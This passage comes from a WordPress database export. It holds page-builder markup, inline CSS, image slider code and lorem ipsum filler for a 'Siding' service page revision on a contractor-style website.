wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1715a7e2-d9ed-427a-be77-136e8c2c931b\"} -->\n<style type=\"text/css\"> .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1715a7e2-d9ed-427a-be77-136e8c2c931b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"efa13df2-51dc-4c44-938f-814450f36d07\"} -->\n<style type=\"text/css\"> .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-efa13df2-51dc-4c44-938f-814450f36d07\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"49885c91-6f61-4ac3-8911-3a58424dd7c7\"} -->\n<style type=\"text/css\"> .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://cteisys.com/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/248413504_4961941493820252_6022205579321516239_n.jpg\" alt=\"\" data-id=\"411\" data-link=\"https://cteisys.com/248413504_4961941493820252_6022205579321516239_n/\" class=\"wp-image-411\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" data-id=\"413\" data-link=\"https://cteisys.com/c60adea113fb2f5f80419bb170309509/\" class=\"wp-image-413\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg\" alt=\"\" data-id=\"414\" data-link=\"https://cteisys.com/dsc03903-1/\" class=\"wp-image-414\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"baa4317a-0da5-4ce3-9276-68d750099fbb\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-baa4317a-0da5-4ce3-9276-68d750099fbb\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8b199e02-8b7a-4370-bd4d-3421bc4a7624\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"44cd821a-9dd0-4ac7-9c82-f555d98e54fe\"} -->\n<style type=\"text/css\"> .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"7ca68574-412c-4830-b622-e36d4f00ea49\"} -->\n<style type=\"text/css\"> .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7ca68574-412c-4830-b622-e36d4f00ea49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"24b580d3-82a8-4aa7-832b-5128d624b5e1\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-24b580d3-82a8-4aa7-832b-5128d624b5e1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Siding','','inherit','closed','closed','','215-revision-v1','','','2022-08-23 18:49:02','2022-08-23 18:49:02','',215,'https://cteisys.com/?p=454',0,'revision','',0),(455,1,'2022-08-23 18:50:19','2022-08-23 18:50:19','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"83cb1aa8-0231-4055-b4ea-269bc3094807\"} -->\n<style type=\"text/css\"> .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-83cb1aa8-0231-4055-b4ea-269bc3094807 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap 